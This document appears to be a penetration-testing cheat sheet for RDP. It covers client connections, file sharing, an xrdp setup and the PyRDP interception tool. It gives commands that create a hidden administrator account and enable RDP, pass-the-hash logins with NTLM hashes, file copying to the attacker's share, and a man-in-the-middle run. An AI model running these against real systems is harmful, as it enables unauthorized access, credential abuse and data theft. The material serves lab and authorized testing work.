Remote Desktop Protocol (RDP) – Port 3389

If you find .rdp files, see Mimikatz for Windows Credential Manager.

For RDP over SSH, see Port Forwarding / Tunneling.

Bruteforce

See Crowbar.

Connect to RDP from Kali

Prerequisites

User needs to be in the “Remote Desktop Users” group to be able to log in.

net user /add myprecious MyPrecious123

net localgroup "Remote Desktop Users" myprecious /add

net user myprecious MyPrecious123 /add
net localgroup Administrators myprecious /add
net localgroup "Remote Desktop Users" myprecious /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user myprecious

rdesktop

Rdesktop is a basic Linux Remote desktop client.

rdesktop $IP -u <username>

rdesktop $IP -u <username> -p <password> -g 1024x768 -x 0x80

Sharing Kali directory /home/kali/share

Redirects a path to the share \\tsclient\<sharename> on the server (requires Windows XP or newer). The share name is limited to 8 characters.

rdesktop $IP -d <domain> -u <username> -r disk:myshare=/home/kali/share

Access the share on Windows

dir \\tsclient\myshare

copy <filename> \\tsclient\myshare\

Freerdp

Use FreeRDP, an X11 client already installed on Kali Linux.

man xfreerdp

xfreerdp /cert:ignore /f /u:${USER} /v:$IP

xfreerdp /cert:ignore /u:${USER} /pth:${NTLM_HASH} /v:${IP}

xfreerdp /cert:ignore /u:${USER} /d:${DOMAIN} /pth:${NTLM_HASH} /v:${IP}

xfreerdp /cert:ignore /f /u:${USER} /p:${PASS} /v:$IP:$PORT

xfreerdp /cert:ignore /u:${USER} /d:${DOMAIN} /v:$IP:3389 /drive:myshare,/home/kali/share

dir \\tsclient\myshare

Connect to RDP from Windows

Type rdp in the Windows search bar.

Remote Desktop Connection Manager

Local user

<machine name>\<username>
.\<username>

RDP Server

xrdp – Open-source Remote Desktop Protocol server

sudo apt install -y kali-desktop-xfce xorg xrdp

sudo systemctl enable xrdp --now

sudo adduser xrdp ssl-cert

sudo reboot

Will give the port used.

sudo systemctl status xrdp

Connect as usual with mstsc or rdesktop.

PyRDP attack tool

PyRDP is a Python Remote Desktop Protocol (RDP) Monster-in-the-Middle (MITM) tool and library.

Official Documentation

Installation

git clone https://github.com/gosecure/pyrdp.git
apt install python3.9-venv
cd pyrdp
python3 -m venv venv
source venv/bin/activate
pip3 install -U pip setuptools wheel
pip3 install -U -e '.[full]'

If you ever want to leave your virtual environment, you can simply deactivate it:

deactivate

Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell commands.

cd pyrdp
python3 -m venv venv
source venv/bin/activate

Help

pyrdp-mitm.py -h

Monster-in-the-middle

pyrdp-mitm.py $IP

# For the replay
pyrdp-mitm.py -l 0.0.0.0:3389 <public IP>

Configure port forwarding in virtualbox or vmware:
Host port: 13389
guest port 3389